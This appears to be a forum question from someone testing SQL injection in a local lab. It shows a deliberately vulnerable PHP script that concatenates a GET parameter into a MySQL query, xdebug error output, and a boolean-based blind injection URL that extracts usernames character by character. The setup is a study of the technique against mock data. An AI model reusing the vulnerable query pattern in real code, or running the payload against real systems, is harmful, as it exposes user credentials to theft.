I don't have a production server to test on and I don't want to install apache, php and mysql on my main dev box so I came here for some suggestions/answers.
I have a mysql database containing mock user data (usernames and passwords)
Code
mysql> select * from test;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | user1 | pass1 |
| 2 | user2 | pass2 |
| 3 | user3 | pass3 |
+----+----------+----------+
3 rows in set (0.00 sec)
and I have a SQLI vulnerable php script:
Code
<?php
// Create connection
$con=mysql_connect("127.0.0.1","root","");
mysql_select_db('test', $con);
$id = $_GET["id"];
$result = mysql_query("SELECT * FROM test WHERE id=" . $id);
while($row = mysql_fetch_array($result)) {
echo "<p>" . $row['username'] . " " . $row['password'] . "</p>";
echo "<br>";
}
mysql_close($con);
?>
and I am running this in a WAMP server environment.
I am trying to test out a SQL injection technique, but when I test it the source code displays errors, although the data is still printed int he browser. What is weirder is that the data printed in the browser (username and password) is not in the html at all in firefox.
and here is the html that shows up even though the user data is still printed to the screen:
Code
<br />
<font size='1'><table class='xdebug-error xe-deprecated' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in C:\wamp\www\test.php on line <i>3</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0010</td><td bgcolor='#eeeeec' align='right'>134776</td><td bgcolor='#eeeeec'>{main}( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>0</td></tr>
<tr><td bgcolor='#eeeeec' align='center'>2</td><td bgcolor='#eeeeec' align='center'>0.0010</td><td bgcolor='#eeeeec' align='right'>134960</td><td bgcolor='#eeeeec'><a href='http://www.php.net/function.mysql-connect' target='_new'>mysql_connect</a>
( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>3</td></tr>
</table></font>
<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\test.php on line <i>12</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0010</td><td bgcolor='#eeeeec' align='right'>134776</td><td bgcolor='#eeeeec'>{main}( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>0</td></tr>
<tr><td bgcolor='#eeeeec' align='center'>2</td><td bgcolor='#eeeeec' align='center'>0.0100</td><td bgcolor='#eeeeec' align='right'>142048</td><td bgcolor='#eeeeec'><a href='http://www.php.net/function.mysql-fetch-array' target='_new'>mysql_fetch_array</a>
( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>12</td></tr>
</table></font>
The <br /> shows up why is the data truncated even though it is still displaying in the browser.
The SQLI that I am attempting to use is called boolean enumeration where you test each position of a returned sql statement for equality, inferiority, or superiority, adjusting your test parameters until you have a match.
Code
http://127.0.0.1/test.php?id=1 AND (SUBSTRING((SELECT username FROM test LIMIT 1,1), 1,1) > CHAR(63))--+
I assume it is partly because of the boolean expression php is not expecting but meh. Anyone have some input? Weird enough the data shows up in internet explorer. This is causing my application I am making to throw up.